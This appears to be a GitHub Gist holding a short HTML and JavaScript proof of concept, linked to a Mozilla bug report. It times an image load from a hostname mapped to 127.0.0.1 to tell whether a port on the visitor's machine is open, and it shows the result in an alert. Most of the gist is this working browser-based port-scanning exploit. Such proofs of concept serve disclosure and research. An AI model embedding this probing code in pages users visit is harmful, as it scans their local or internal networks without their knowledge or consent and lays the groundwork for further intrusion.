Created
September 3, 2018 14:19
-
-
Save Shamar/6a694bc020cdc9b3f8027a0c3ccdabcd to your computer and use it in GitHub Desktop.
PoC exploit: bypass a corporate firewall through JavaScript and a DNS
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <!-- This is a very simple Proof of Concepts of just one of the possible attacks | |
| described at https://bugzilla.mozilla.org/show_bug.cgi?id=1487081 | |
| You can give it a try by following the instruction at | |
| https://dev.to/shamar/the-meltdown-of-the-web-4p1m | |
| Just please, remember to restore your /etc/hosts after. | |
| --> | |
| <head> | |
| <script type="text/javascript"> | |
| var t0 = new Date(); | |
| var done = function(){ | |
| var t1 = new Date(); | |
| var delta = t1 - t0; | |
| var isrc = document.getElementById('img').src; | |
| var port = isrc.substr(isrc.indexOf('net:') + 4, isrc.indexOf('/test') - isrc.indexOf('net:') - 4); | |
| var result = "Your port " + port + " is "; | |
| if(delta < 400) | |
| result += "open. Thanks for sharing! ;-)"; | |
| else | |
| result += "closed. You are lucky! Can I try again?"; | |
| alert(result); | |
| } | |
| </script> | |
| </head> | |
| <body onload="done()"> | |
| <!-- local.jsfiddle.net is mapped to 127.0.0.1 --> | |
| <img id='img' src='https://local.jsfiddle.net:1234/test.gif'> | |
| </body> | |
| </html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment